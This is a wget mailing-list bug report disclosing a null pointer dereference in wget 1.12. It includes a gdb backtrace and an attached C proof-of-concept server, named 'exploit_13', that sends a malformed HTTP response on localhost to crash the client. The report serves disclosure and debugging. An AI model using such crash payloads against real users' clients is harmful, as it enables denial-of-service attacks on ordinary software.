[Bug-wget] wget bug report

[Ildar Isaev]

Hi, i downloaded wget-1.12 from ftp://ftp.gnu.org/gnu/wget/wget-1.12.tar.bz2

It turns out it has a null pointer dereference bug. This is how it may 
be reproduced.

Expl_for_wget.c (attached) is a small pseudo web server. Compile it and run:

address@hidden:$ gcc -Wall expl_for_wget.c -o expl_for_wget
address@hidden:$ ./expl_for_wget &
[1] 7330
address@hidden:$ gdb --args <path_to_wget_install_dir>/bin/wget 
http://127.0.0.1:3500/
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
<http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) run
[Thread debugging using libthread_db enabled]
--2010-05-14 22:39:36--  http://127.0.0.1:3500/
Connecting to 127.0.0.1:3500... connected.
HTTP request sent, awaiting response... [New Thread 0x403a26c0 (LWP 7332)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x403a26c0 (LWP 7332)]
0x40286613 in strlen () from /lib/tls/i686/cmov/libc.so.6
(gdb) bt
#0  0x40286613 in strlen () from /lib/tls/i686/cmov/libc.so.6
#1  0x08081a2d in xstrdup (string=0x0) at xmalloc.c:117
#2  0x08063c7d in gethttp (u=0x8a280e8, hs=0xbffa8be0, dt=0xbffa8f24, 
proxy=0x0, iri=0x8a27d40) at http.c:1832
#3  0x08066151 in http_loop (u=0x8a280e8, newloc=0xbffa8dec, 
local_file=0xbffa8dd8, referer=0x0, dt=0xbffa8f24, proxy=0x0,
   iri=0x8a27d40) at http.c:2581
#4  0x08072798 in retrieve_url (orig_parsed=0x8a280e8, origurl=0x8a27dd8 
"http://127.0.0.1:3500/";, file=0xbffa8f2c,
   newloc=0xbffa8f28, refurl=0x0, dt=0xbffa8f24, recursive=false, 
iri=0x8a27d40, register_status=true) at retr.c:692
#5  0x0806c46e in main (argc=2, argv=0xbffa9014) at main.c:1294
(gdb) up
#1  0x08081a2d in xstrdup (string=0x0) at xmalloc.c:117
117      return xmemdup (string, strlen (string) + 1);
(gdb)
#2  0x08063c7d in gethttp (u=0x8a280e8, hs=0xbffa8be0, dt=0xbffa8f24, 
proxy=0x0, iri=0x8a27d40) at http.c:1832
1832      hs->message = xstrdup (message);
(gdb) list
1827      resp = resp_new (head);
1828   
1829      /* Check for status line.  */
1830      message = NULL;
1831      statcode = resp_status (resp, &message);
1832      hs->message = xstrdup (message);
1833      if (!opt.server_response)
1834        logprintf (LOG_VERBOSE, "%2d %s\n", statcode,
1835                   message ? quotearg_style (escape_quoting_style, 
message) : "");
1836      else
(gdb) p message
$1 = 0x0

One can see that null pointer dereference occurs at http.c:1832 as 
'message' is equal to null.

Best regards,
Ildar

/* Server code in C */
//exploit_13
 
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
 
int main(void)
{
  struct sockaddr_in stSockAddr;
  int sfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

  if(sfd == -1)
  {
    perror("can not create socket");
    exit(EXIT_FAILURE);
  }
 
  memset(&stSockAddr, 0, sizeof(struct sockaddr_in));
 
  stSockAddr.sin_family = AF_INET;
  stSockAddr.sin_port = htons(3500);
  inet_pton(AF_INET, "127.0.0.1", &stSockAddr.sin_addr);

  int bindRes = bind(sfd, (const struct sockaddr*)&stSockAddr, sizeof(struct 
sockaddr_in));
 
  if(bindRes == -1)
  {
    perror("error bind failed");
    close(sfd);
    exit(EXIT_FAILURE);
  }

  int listenRes = listen(sfd, 10);
 
  if(listenRes == -1)
  {
    perror("error listen failed");
    close(sfd);
    exit(EXIT_FAILURE);
  }
 
  int cfd = accept(sfd, NULL, NULL);
 
  char buf[227] = 
{0x48,0x54,0x54,0x50,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0A,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
        
  write(cfd, buf, 227);
  close(cfd);
 
  return 0;
}